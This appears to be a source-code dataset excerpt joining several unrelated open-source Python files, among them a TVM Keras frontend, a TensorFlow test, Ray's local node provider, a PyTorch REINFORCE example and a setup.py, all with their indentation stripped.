c_op = etab.new_const(buf)
h_op = etab.new_const(buf)
inexpr = [inexpr, h_op, c_op]
in_data = inexpr[0]
next_h = inexpr[1]
next_c = inexpr[2]
weightList = keras_layer.get_weights()
in_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.input_shape)[0])
kernel_weight = etab.new_const(weightList[0].transpose([1, 0]))
recurrent_weight = etab.new_const(weightList[1].transpose([1, 0]))
in_bias = etab.new_const(weightList[2])
units = list(weightList[0].shape)[1]
time_steps = in_shape[1]
in_data = _op.squeeze(in_data, axis=[0])
in_data = _op.split(in_data, indices_or_sections=time_steps, axis=0)
# loop for the number of time_steps
for data in in_data:
ixh1 = _op.nn.dense(data, kernel_weight, units=units)
ixh2 = _op.nn.bias_add(_op.nn.dense(next_h, recurrent_weight, units=units), bias=in_bias)
gate = ixh1 + ixh2
gates = _op.split(gate, indices_or_sections=4, axis=1)
in_gate = _convert_recurrent_activation(gates[0], keras_layer)
in_transform = _convert_recurrent_activation(gates[1], keras_layer)
next_c = in_transform * next_c + in_gate * _convert_activation(gates[2], keras_layer, None)
out_gate = _convert_recurrent_activation(gates[3], keras_layer)
next_h = out_gate * _convert_activation(next_c, keras_layer, None)
out_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.output_shape)[0])
out = _op.reshape(next_h, newshape=out_shape)
return [out, next_h, next_c]
def _convert_simple_rnn(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
if not isinstance(inexpr, list):
buf = np.zeros((1, keras_layer.units), 'float32')
prev_op = etab.new_const(buf)
inexpr = [inexpr, prev_op]
in_data = inexpr[0]
prev_op = inexpr[1]
weightList = keras_layer.get_weights()
kernel_weight = etab.new_const(weightList[0].transpose([1, 0]))
recurrent_weight = etab.new_const(weightList[1].transpose([1, 0]))
in_bias = etab.new_const(weightList[2])
units = list(weightList[0].shape)[1]
in_data = _op.nn.batch_flatten(in_data)
ixh = _op.nn.bias_add(_op.nn.dense(in_data, kernel_weight, units=units), bias=in_bias)
prev_op = _op.nn.batch_flatten(prev_op)
ixh2 = _op.nn.dense(prev_op, recurrent_weight, units=units)
output = ixh + ixh2
output = _convert_activation(output, keras_layer, None)
out_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.output_shape)[0])
output = _op.reshape(output, newshape=out_shape)
return [output, output]
def _convert_gru(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
if not isinstance(inexpr, list):
buf = np.zeros((1, keras_layer.units), 'float32')
h_tm1 = etab.new_const(buf)
inexpr = [inexpr, h_tm1]
in_data = inexpr[0]
h_tm1_op = inexpr[1]
weightList = keras_layer.get_weights()
kernel_weight = etab.new_const(weightList[0].transpose([1, 0]))
recurrent_weight = etab.new_const(weightList[1].transpose([1, 0]))
in_bias = etab.new_const(weightList[2])
units = list(weightList[0].shape)[1]
in_data = _op.nn.batch_flatten(in_data)
matrix_x = _op.nn.bias_add(_op.nn.dense(in_data, kernel_weight, units=units), in_bias)
# inputs projected by all gate matrices at once
split_indices = [keras_layer.units, 2 * keras_layer.units]
gates = _op.split(matrix_x, indices_or_sections=split_indices, axis=1)
x_z = gates[0]
x_r = gates[1]
x_h = gates[2]
# hidden state projected separately for update/reset and new
units = 2 * keras_layer.units
split_indices = [units]
rec_weights = _op.split(recurrent_weight, indices_or_sections=split_indices, axis=0)
h_tm1_op = _op.nn.batch_flatten(h_tm1_op)
matrix_inner = _op.nn.dense(h_tm1_op, rec_weights[0], units=units)
split_indices = [keras_layer.units]
recurrent = _op.split(matrix_inner, indices_or_sections=split_indices, axis=1)
recurrent_z = recurrent[0]
recurrent_r = recurrent[1]
rec_act_z = _convert_recurrent_activation(x_z + recurrent_z, keras_layer)
rec_act_r = _convert_recurrent_activation(x_r + recurrent_r, keras_layer)
units = keras_layer.units
recurrent_h = _op.nn.dense(rec_act_r * h_tm1_op, rec_weights[1], units=units)
act_hh = _convert_activation(x_h + recurrent_h, keras_layer, None)
# previous and candidate state mixed by update gate
output = rec_act_z * h_tm1_op + (_expr.const(1., dtype='float32') - rec_act_z) * act_hh
out_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.output_shape)[0])
output = _op.reshape(output, newshape=out_shape)
return [output, output]
def _default_skip(inexpr, keras_layer, _): # pylint: disable=unused-argument
"""Layers that can be skipped because they are train time only."""
return inexpr
_convert_map = {
'Dense' : _convert_dense,
'Activation' : _convert_activation,
'ReLU' : _convert_advanced_activation,
'LeakyReLU' : _convert_advanced_activation,
'PReLU' : _convert_advanced_activation,
'ELU' : _convert_advanced_activation,
'ThresholdedReLU' : _convert_advanced_activation,
'AveragePooling2D' : _convert_pooling,
'MaxPooling2D' : _convert_pooling,
'GlobalAveragePooling2D' : _convert_pooling,
'GlobalMaxPooling2D' : _convert_pooling,
'Conv2D' : _convert_convolution,
'Conv2DTranspose' : _convert_convolution,
'DepthwiseConv2D' : _convert_convolution,
'SeparableConv2D' : _convert_separable_convolution,
'Flatten' : _convert_flatten,
'Reshape' : _convert_reshape,
'Concatenate' : _convert_concat,
'BatchNormalization' : _convert_batchnorm,
'BatchNormalizationV2' : _convert_batchnorm,
'Add' : _convert_merge,
'Subtract' : _convert_merge,
'Multiply' : _convert_merge,
'ZeroPadding2D' : _convert_padding,
'UpSampling2D' : _convert_upsample,
'Cropping2D' : _convert_cropping,
'EnterInteger' : _convert_enter_integer,
'DQuantizeLayer' : dquantize,
'BinaryConv2D' : _convert_bitserial_convolution,
'BinaryDense' : _convert_bitserial_dense,
'Scalu' : _convert_scalu,
'PACT' : _convert_pact,
'SAWBConv2D' : _convert_sawb_conv2d,
# 'ZeroPadding1D' : _convert_padding,
# 'AveragePooling1D' : _convert_pooling,
# 'MaxPooling1D' : _convert_pooling,
# 'GlobalAveragePooling1D' : _convert_pooling,
# 'GlobalMaxPooling1D' : _convert_pooling,
# 'Cropping1D' : _convert_cropping,
# 'UpSampling1D' : _convert_upsample,
# 'UpSampling3D' : _convert_upsample,
# 'Conv1D' : _convert_convolution1d,
'SimpleRNN' : _convert_simple_rnn,
'LSTM' : _convert_lstm,
'GRU' : _convert_gru,
# 'Bidirectional' : _convert_bidirectional,
# 'TimeDistributed' : _default_skip,
'Average' : _convert_merge,
'Maximum' : _convert_merge,
# 'Dot' : _convert_merge,
# 'Permute' : _convert_permute,
# 'Embedding' : _convert_embedding,
# 'RepeatVector' : _convert_repeat_vector,
'InputLayer' : _default_skip,
'Dropout' : _default_skip,
'SpatialDropout2D' : _default_skip,
'SpatialDropout1D' : _default_skip,
}
def _check_unsupported_layers(model):
for layer in model.layers:
op_name = type(layer).__name__
if op_name not in _convert_map:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(op_name))
def keras_op_to_relay(inexpr, keras_layer, outname, etab):
"""Convert a Keras layer to a Relay expression and update the expression table.
Parameters
----------
inexpr : relay.expr.Expr or a list of it
The input Relay expression(s).
keras_layer : keras.layers
The Keras layer to be converted.
outname : str
Name of the output Relay expression.
etab : relay.frontend.common.ExprTable
The global expression table to be updated.
"""
op_name = type(keras_layer).__name__
if op_name not in _convert_map:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(op_name))
outs = _convert_map[op_name](inexpr, keras_layer, etab)
outs = _as_list(outs)
for t_idx, out in enumerate(outs):
name = outname + ":" + str(t_idx)
etab.set_expr(name, out)
def from_keras(model, shape=None, layout='NCHW', weight_bits=0, activation_bits=0, pact_alphas=None, sawb_scales=None, tf_params=None):
"""Convert keras model to relay Function.
Parameters
----------
model : keras.engine.training.Model
The keras model to be converted.
shape: dict of str to int list/tuple
Input shapes of the model, optional
layout: str
What data layout to use, should be NCHW or NHWC
Returns
-------
mod : tvm.relay.Module
The relay module for compilation.
params : dict of str to tvm.NDArray
The parameter dict to be used by Relay.
"""
try:
import tensorflow.keras as keras
except ImportError:
raise ImportError('Keras must be installed')
assert isinstance(model, keras.models.Model)
if keras.backend.backend() != 'tensorflow':
raise ValueError("Keras frontend currently supports tensorflow backend only.")
if keras.backend.image_data_format() != 'channels_last':
raise ValueError("Keras frontend currently supports data_format = channels_last only.")
#_check_unsupported_layers(model)
def _convert_input_layer(keras_layer):
input_name = keras_layer.name
input_shape = shape[input_name] if shape is not None and input_name in shape else None
# Check if input shape is defined in its output.
if input_shape is None:
if keras_layer.output.shape is not None:
input_shape = keras_layer.output.shape.as_list()
# Check outbound layers, if they have data format NHWC, then we need to transpose.
out_layer = keras_layer.outbound_nodes[0].outbound_layer
if hasattr(out_layer, 'data_format'):
if out_layer.data_format == 'channels_last' and layout == 'NCHW':
input_shape = [input_shape[0], input_shape[3], input_shape[1], input_shape[2]]
elif out_layer.data_format == 'channels_first' and layout == 'NHWC':
input_shape = [input_shape[0], input_shape[2], input_shape[3], input_shape[1]]
etab.set_expr(input_name, new_var(input_name, shape=input_shape))
etab = ExprTable()
etab.data_layout = layout
etab.weight_bits = weight_bits
etab.activation_bits = activation_bits
etab.pact_alphas = pact_alphas
etab.sawb_scales = sawb_scales
etab.tf_params = tf_params
for keras_layer in model.layers:
if isinstance(keras_layer, keras.layers.InputLayer):
_convert_input_layer(keras_layer)
else:
inbound_nodes = keras_layer.inbound_nodes if hasattr(keras_layer, 'inbound_nodes') \
else keras_layer._inbound_nodes if hasattr(keras_layer, '_inbound_nodes') \
else None
if inbound_nodes is None:
raise TypeError("Unknown layer type or unsupported Keras version : {}"
.format(keras_layer))
for node_idx, node in enumerate(inbound_nodes):
# If some nodes in imported model is not relevant to the current model,
# skip such layers. model._network_nodes contains keys of all nodes relevant
# to the current model.
#if not model._node_key(keras_layer, node_idx) in model._network_nodes:
# continue
inexpr = []
# Since Keras allows creating multiple layers from the same name instance,
# we append node index to the expr name to make it unique.
# The one exception is InputLayer. Changing input variable names after conversion
# would confuse users, so we should keep them as far as possible. Fortunately,
# they are named uniquely to input_1, input_2, input_3... by default.
def _as_list(x):
if isinstance(x, list):
return x
else:
return [x]
zip_node = zip(_as_list(node.node_indices), _as_list(node.tensor_indices), _as_list(node.inbound_layers))
for n_idx, t_idx, inbound_layer in zip_node:
if isinstance(inbound_layer, keras.layers.InputLayer):
expr_name = inbound_layer.name
_convert_input_layer(inbound_layer)
else:
expr_name = inbound_layer.output.name + ':' + str(t_idx)
expr = etab.get_expr(expr_name)
inexpr.append(expr)
if len(inexpr) == 1:
inexpr = inexpr[0]
# In tf 2.0 outputs go through layerless identity nodes. Check if if thats the case here
# and name appropriately.
op_name = keras_layer.output.name
for c in keras_layer.output.consumers():
for o in c.outputs:
if o in model.outputs:
op_name = o.name
keras_op_to_relay(inexpr, keras_layer, op_name, etab)
# model._output_coordinates contains out_node(oc[0]), node_index(oc[1]) and tensor_index(oc[2])
# Get all output nodes in etab using the name made from above values.
# The out exprs were added to etab in keras_op_to_relay using this name.
outexpr = []
for output in model.outputs:
out_ctr = 0
while (output.name + ':' + str(out_ctr)) in outexpr:
out_ctr += 1
outexpr.append(etab.get_expr(output.name + ':' + str(out_ctr)))
outexpr = outexpr[0] if len(outexpr) == 1 else _expr.Tuple(outexpr)
func = _expr.Function(ir_pass.free_vars(outexpr), outexpr)
params = {k:_nd.array(np.array(v, dtype=v.dtype)) for k, v in etab.params.items()}
return _module.Module.from_expr(func), params
|
py | b41599af5b8f2d2b5ed3388a018ef4c06d1406c1 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for a little bit of strategy_combinations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
class StrategyCombinationsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
# Need to call set_virtual_cpus_to_at_least() in setUp with the maximum
# value needed in any test.
strategy_combinations.set_virtual_cpus_to_at_least(3)
super(StrategyCombinationsTest, self).setUp()
def test3VirtualCPUs(self):
cpu_device = config.list_physical_devices("CPU")[0]
self.assertLen(config.get_logical_device_configuration(cpu_device), 3)
def testSetVirtualCPUsAgain(self):
strategy_combinations.set_virtual_cpus_to_at_least(2)
cpu_device = config.list_physical_devices("CPU")[0]
self.assertLen(config.get_logical_device_configuration(cpu_device), 3)
def testSetVirtualCPUsErrors(self):
with self.assertRaises(ValueError):
strategy_combinations.set_virtual_cpus_to_at_least(0)
with self.assertRaisesRegexp(RuntimeError, "with 3 < 5 virtual CPUs"):
strategy_combinations.set_virtual_cpus_to_at_least(5)
@combinations.generate(combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_cpu_1_and_2],
mode=["graph", "eager"]))
def testMirrored2CPUs(self, distribution):
with distribution.scope():
one_per_replica = distribution.experimental_run_v2(
lambda: constant_op.constant(1))
num_replicas = distribution.reduce(
reduce_util.ReduceOp.SUM, one_per_replica, axis=None)
self.assertEqual(2, self.evaluate(num_replicas))
if __name__ == "__main__":
test.main()
|
py | b4159a43018df97edccb0ac85f32b4cfb3f90db4 | # coding=utf-8
# ASCII ONLY IN THIS FILE THOUGH!!!!!!!
# Python does some stupid bullshit of respecting LC_ALL over the encoding on the
# file, so in order to undo Python's ridiculous fucking idiocy, we have to have
# our own check.
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright 2012, Elsie Powell, http://embolalia.com
# Copyright 2012, Elad Alfassa <[email protected]>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import namedtuple
import locale
import re
import sys
import pkg_resources
__all__ = [
'bot',
'config',
'db',
'formatting',
'irc',
'loader',
'logger',
'module', # deprecated in 7.1, removed in 9.0
'plugin',
'tools',
'trigger',
'version_info',
]
loc = locale.getlocale()
if sys.version_info.major > 2:
if not loc[1] or 'UTF-8' not in loc[1]:
print('WARNING!!! You are running with a non-UTF8 locale environment '
'variables (e.g. LC_ALL is set to "C"), which makes Python 3 do '
'stupid things. If you get strange errors, please set it to '
'something like "en_US.UTF-8".', file=sys.stderr)
__version__ = pkg_resources.get_distribution('sopel').version
def _version_info(version=__version__):
regex = re.compile(r'(\d+)\.(\d+)\.(\d+)(?:(a|b|rc)(\d+))?.*')
version_groups = regex.match(version).groups()
major, minor, micro = (int(piece) for piece in version_groups[0:3])
level = version_groups[3]
serial = int(version_groups[4] or 0)
if level == 'a':
level = 'alpha'
elif level == 'b':
level = 'beta'
elif level == 'rc':
level = 'candidate'
elif not level and version_groups[4] is None:
level = 'final'
else:
level = 'alpha'
version_type = namedtuple('version_info',
'major, minor, micro, releaselevel, serial')
return version_type(major, minor, micro, level, serial)
version_info = _version_info()
|
py | b4159cf0640ca2e583536fb7ff9411162ad258e8 | #
# (C) Copyright 2013 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
""" A collection of unit manipulation functions that are used as converters
for UnitManipulationAdapter instantiations.
See unit_manipulation_adapter_factories.py for concrete examples of how
they are used.
"""
import numpy
# ETS
from scimath import units
from scimath.units.api import UnitArray
################################################################################
# Unit Converter functions:
#
# These functions do unit conversion on objects with units to the same type
# of object with new units.
################################################################################
def unit_array_units_converter(unit_array, new_units):
""" Convert a UnitArray from one set of units to another.
"""
if unit_array.units != new_units:
# A conversion is needed. Must pass in a real ndarray instead of
# a UnitArray since operations on it will also try to conversions that
# we don't want it to do.
result = units.convert(
unit_array.view(numpy.ndarray), unit_array.units,
new_units).view(UnitArray)
result.units = new_units
else:
# No conversion needed. Just return the unit_array.
result = unit_array
return result
################################################################################
# Unit 'Setter' functions.
#
# These functions don't really do unit conversion as much as the add units to
# objects that don't have them. This often involves converting them to
# a new type of object.
################################################################################
def array_to_unit_array_converter(array, new_units):
""" Create a UnitArray with units='new_units' from the given 'array'.
"""
return UnitArray(array, units=new_units)
################################################################################
# Unit 'Correcter' functions.
#
# These functions *overwrite* the existing units on an object with new units.
# No conversion unit conversion takes place.
################################################################################
def unit_array_units_overwriter(unit_array, new_units):
""" Overwrite the units for a UnitArray with the new units.
"""
if unit_array.units != new_units:
unit_array.units = new_units
return unit_array
|
py | b4159d168d99d380fb2e77e3c6a6cb59f0937b4e | import errno
import os
import platform
import subprocess
import shutil
def strip_quotes(s):
# Don't wrap commands to subprocess.call/Popen in quotes.
return s.strip('\'"')
def getStdout(cmd_and_args):
# Can't use subprocess.check_output as it's not available in Python 2.6;
# It's also not quite the same as check_output, since we also verify that
# no stderr was produced
p = subprocess.Popen([strip_quotes(cmd_and_args[0])] + cmd_and_args[1:],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
r = p.wait()
if r != 0:
raise Exception("Command failed: " + str(cmd_and_args))
if stderr:
raise Exception("stderr from command: " + str(cmd_and_args))
return stdout
def mkdirp(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def lndir(srcdir, dstdir):
# Create symlinks for all files in src directory.
# Not all developers might have lndir installed.
# os.system('lndir -silent {0} {1}'.format(srcdir, dstdir))
for filename in os.listdir(srcdir):
src = os.path.join(srcdir, filename)
dst = os.path.join(dstdir, filename)
if os.path.isfile(src):
link_or_copy_file(src, dst)
else:
os.mkdir(dst)
lndir(src, dst)
# On Windows, os.symlink is not defined with Python 2.7, but is in Python 3
# when using msys2, as GHC does. Unfortunately, only Administrative users have
# the privileges necessary to create symbolic links by default. Consequently we
# are forced to just copy instead.
#
# We define the following function to make this magic more
# explicit/discoverable. You are enouraged to use it instead of os.symlink.
if platform.system() == 'Windows':
link_or_copy_file = shutil.copyfile
else:
link_or_copy_file = os.symlink
|
py | b4159d5be27c32a0bdd99ab2decafc1f4a46ec0b |
import argparse
import gym
import numpy as np
from itertools import count
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
from torch.distributions import Categorical
parser = argparse.ArgumentParser(description='PyTorch REINFORCE example')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor (default: 0.99)')
parser.add_argument('--seed', type=int, default=543, metavar='N',
help='random seed (default: 543)')
parser.add_argument('--render', action='store_true',
help='render the environment')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='interval between training status logs (default: 10)')
args = parser.parse_args()
env = gym.make('CartPole-v0')
env.seed(args.seed)
torch.manual_seed(args.seed)
class Policy(nn.Module):
def __init__(self):
super(Policy, self).__init__()
self.affine1 = nn.Linear(4, 128)
self.affine2 = nn.Linear(128, 2)
self.saved_log_probs = []
self.rewards = []
def forward(self, x):
x = F.relu(self.affine1(x))
action_scores = self.affine2(x)
return F.softmax(action_scores, dim=1)
policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=1e-2)
eps = np.finfo(np.float32).eps.item()
def select_action(state):
state = torch.from_numpy(state).float().unsqueeze(0)
probs = policy(state)
m = Categorical(probs)
action = m.sample()
policy.saved_log_probs.append(m.log_prob(action))
return action.item()
def finish_episode():
R = 0
policy_loss = []
rewards = []
for r in policy.rewards[::-1]:
R = r + args.gamma * R
rewards.insert(0, R)
rewards = torch.tensor(rewards)
rewards = (rewards - rewards.mean()) / (rewards.std() + eps)
for log_prob, reward in zip(policy.saved_log_probs, rewards):
policy_loss.append(-log_prob * reward)
optimizer.zero_grad()
policy_loss = torch.cat(policy_loss).sum()
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
def main():
running_reward = 10
for i_episode in count(1):
state = env.reset()
for t in range(10000): # Don't infinite loop while learning
action = select_action(state)
state, reward, done, _ = env.step(action)
if args.render:
env.render()
policy.rewards.append(reward)
if done:
break
running_reward = running_reward * 0.99 + t * 0.01
finish_episode()
if i_episode % args.log_interval == 0:
print('Episode {}\tLast length: {:5d}\tAverage length: {:.2f}'.format(
i_episode, t, running_reward))
if running_reward > env.spec.reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(running_reward, t))
break
if __name__ == '__main__':
main()
|
py | b4159e401d51afa26f33e832cb9e3cae9faa470f | from filelock import FileLock
from threading import RLock
import json
import os
import socket
import logging
from ray.autoscaler.node_provider import NodeProvider
from ray.autoscaler.tags import (
TAG_RAY_NODE_KIND,
NODE_KIND_WORKER,
NODE_KIND_HEAD,
TAG_RAY_USER_NODE_TYPE,
TAG_RAY_NODE_NAME,
TAG_RAY_NODE_STATUS,
STATUS_UP_TO_DATE,
)
from ray.autoscaler._private.local.config import bootstrap_local
from ray.autoscaler._private.local.config import get_lock_path
from ray.autoscaler._private.local.config import get_state_path
from ray.autoscaler._private.local.config import LOCAL_CLUSTER_NODE_TYPE
logger = logging.getLogger(__name__)
filelock_logger = logging.getLogger("filelock")
filelock_logger.setLevel(logging.WARNING)
class ClusterState:
def __init__(self, lock_path, save_path, provider_config):
self.lock = RLock()
self.file_lock = FileLock(lock_path)
self.save_path = save_path
with self.lock:
with self.file_lock:
if os.path.exists(self.save_path):
workers = json.loads(open(self.save_path).read())
head_config = workers.get(provider_config["head_ip"])
if (
not head_config
or head_config.get("tags", {}).get(TAG_RAY_NODE_KIND)
!= NODE_KIND_HEAD
):
workers = {}
logger.info("Head IP changed - recreating cluster.")
else:
workers = {}
logger.info(
"ClusterState: " "Loaded cluster state: {}".format(list(workers))
)
for worker_ip in provider_config["worker_ips"]:
if worker_ip not in workers:
workers[worker_ip] = {
"tags": {TAG_RAY_NODE_KIND: NODE_KIND_WORKER},
"state": "terminated",
}
else:
assert (
workers[worker_ip]["tags"][TAG_RAY_NODE_KIND]
== NODE_KIND_WORKER
)
if provider_config["head_ip"] not in workers:
workers[provider_config["head_ip"]] = {
"tags": {TAG_RAY_NODE_KIND: NODE_KIND_HEAD},
"state": "terminated",
}
else:
assert (
workers[provider_config["head_ip"]]["tags"][TAG_RAY_NODE_KIND]
== NODE_KIND_HEAD
)
# Relevant when a user reduces the number of workers
# without changing the headnode.
list_of_node_ips = list(provider_config["worker_ips"])
list_of_node_ips.append(provider_config["head_ip"])
for worker_ip in list(workers):
if worker_ip not in list_of_node_ips:
del workers[worker_ip]
# Set external head ip, if provided by user.
# Necessary if calling `ray up` from outside the network.
# Refer to LocalNodeProvider.external_ip function.
external_head_ip = provider_config.get("external_head_ip")
if external_head_ip:
head = workers[provider_config["head_ip"]]
head["external_ip"] = external_head_ip
assert len(workers) == len(provider_config["worker_ips"]) + 1
with open(self.save_path, "w") as f:
logger.debug(
"ClusterState: " "Writing cluster state: {}".format(workers)
)
f.write(json.dumps(workers))
def get(self):
with self.lock:
with self.file_lock:
workers = json.loads(open(self.save_path).read())
return workers
def put(self, worker_id, info):
assert "tags" in info
assert "state" in info
with self.lock:
with self.file_lock:
workers = self.get()
workers[worker_id] = info
with open(self.save_path, "w") as f:
logger.info(
"ClusterState: "
"Writing cluster state: {}".format(list(workers))
)
f.write(json.dumps(workers))
class OnPremCoordinatorState(ClusterState):
"""Generates & updates the state file of CoordinatorSenderNodeProvider.
Unlike ClusterState, which generates a cluster specific file with
predefined head and worker ips, OnPremCoordinatorState overwrites
ClusterState's __init__ function to generate and manage a unified
file of the status of all the nodes for multiple clusters.
"""
def __init__(self, lock_path, save_path, list_of_node_ips):
self.lock = RLock()
self.file_lock = FileLock(lock_path)
self.save_path = save_path
with self.lock:
with self.file_lock:
if os.path.exists(self.save_path):
nodes = json.loads(open(self.save_path).read())
else:
nodes = {}
logger.info(
"OnPremCoordinatorState: "
"Loaded on prem coordinator state: {}".format(nodes)
)
# Filter removed node ips.
for node_ip in list(nodes):
if node_ip not in list_of_node_ips:
del nodes[node_ip]
for node_ip in list_of_node_ips:
if node_ip not in nodes:
nodes[node_ip] = {
"tags": {},
"state": "terminated",
}
assert len(nodes) == len(list_of_node_ips)
with open(self.save_path, "w") as f:
logger.info(
"OnPremCoordinatorState: "
"Writing on prem coordinator state: {}".format(nodes)
)
f.write(json.dumps(nodes))
class LocalNodeProvider(NodeProvider):
"""NodeProvider for private/local clusters.
`node_id` is overloaded to also be `node_ip` in this class.
When `cluster_name` is provided, it manages a single cluster in a cluster
specific state file. But when `cluster_name` is None, it manages multiple
clusters in a unified state file that requires each node to be tagged with
TAG_RAY_CLUSTER_NAME in create and non_terminated_nodes function calls to
associate each node with the right cluster.
The current use case of managing multiple clusters is by
OnPremCoordinatorServer which receives node provider HTTP requests
from CoordinatorSenderNodeProvider and uses LocalNodeProvider to get
the responses.
"""
def __init__(self, provider_config, cluster_name):
NodeProvider.__init__(self, provider_config, cluster_name)
if cluster_name:
lock_path = get_lock_path(cluster_name)
state_path = get_state_path(cluster_name)
self.state = ClusterState(
lock_path,
state_path,
provider_config,
)
self.use_coordinator = False
else:
# LocalNodeProvider with a coordinator server.
self.state = OnPremCoordinatorState(
"/tmp/coordinator.lock",
"/tmp/coordinator.state",
provider_config["list_of_node_ips"],
)
self.use_coordinator = True
def non_terminated_nodes(self, tag_filters):
workers = self.state.get()
matching_ips = []
for worker_ip, info in workers.items():
if info["state"] == "terminated":
continue
ok = True
for k, v in tag_filters.items():
if info["tags"].get(k) != v:
ok = False
break
if ok:
matching_ips.append(worker_ip)
return matching_ips
def is_running(self, node_id):
return self.state.get()[node_id]["state"] == "running"
def is_terminated(self, node_id):
return not self.is_running(node_id)
def node_tags(self, node_id):
return self.state.get()[node_id]["tags"]
def external_ip(self, node_id):
"""Returns an external ip if the user has supplied one.
Otherwise, use the same logic as internal_ip below.
This can be used to call ray up from outside the network, for example
if the Ray cluster exists in an AWS VPC and we're interacting with
the cluster from a laptop (where using an internal_ip will not work).
Useful for debugging the local node provider with cloud VMs."""
node_state = self.state.get()[node_id]
ext_ip = node_state.get("external_ip")
if ext_ip:
return ext_ip
else:
return socket.gethostbyname(node_id)
def internal_ip(self, node_id):
return socket.gethostbyname(node_id)
def set_node_tags(self, node_id, tags):
with self.state.file_lock:
info = self.state.get()[node_id]
info["tags"].update(tags)
self.state.put(node_id, info)
def create_node(self, node_config, tags, count):
"""Creates min(count, currently available) nodes."""
node_type = tags[TAG_RAY_NODE_KIND]
with self.state.file_lock:
workers = self.state.get()
for node_id, info in workers.items():
if info["state"] == "terminated" and (
self.use_coordinator or info["tags"][TAG_RAY_NODE_KIND] == node_type
):
info["tags"] = tags
info["state"] = "running"
self.state.put(node_id, info)
count = count - 1
if count == 0:
return
def terminate_node(self, node_id):
workers = self.state.get()
info = workers[node_id]
info["state"] = "terminated"
self.state.put(node_id, info)
@staticmethod
def bootstrap_config(cluster_config):
return bootstrap_local(cluster_config)
def record_local_head_state_if_needed(local_provider: LocalNodeProvider) -> None:
"""This function is called on the Ray head from StandardAutoscaler.reset
to record the head node's own existence in the cluster state file.
This is necessary because `provider.create_node` in
`commands.get_or_create_head_node` records the head state on the
cluster-launching machine but not on the head.
"""
head_ip = local_provider.provider_config["head_ip"]
cluster_name = local_provider.cluster_name
# If the head node is not marked as created in the cluster state file,
if head_ip not in local_provider.non_terminated_nodes({}):
# These tags are based on the ones in commands.get_or_create_head_node;
# keep in sync.
head_tags = {
TAG_RAY_NODE_KIND: NODE_KIND_HEAD,
TAG_RAY_USER_NODE_TYPE: LOCAL_CLUSTER_NODE_TYPE,
TAG_RAY_NODE_NAME: "ray-{}-head".format(cluster_name),
TAG_RAY_NODE_STATUS: STATUS_UP_TO_DATE,
}
# Mark the head node as created in the cluster state file.
local_provider.create_node(node_config={}, tags=head_tags, count=1)
assert head_ip in local_provider.non_terminated_nodes({})
|
py | b4159effd47d6e635b3df9dce3921b5d64e6fa02 | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name='microcdt', # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.1.1', # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='A microscopic client library for accessing Cloudant databases',
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
long_description=long_description, # Optional
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url='https://github.com/xpqz/microcdt', # Optional
# This should be your name or the name of the organization which owns the
# project.
author='Stefan Kruger', # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='[email protected]', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
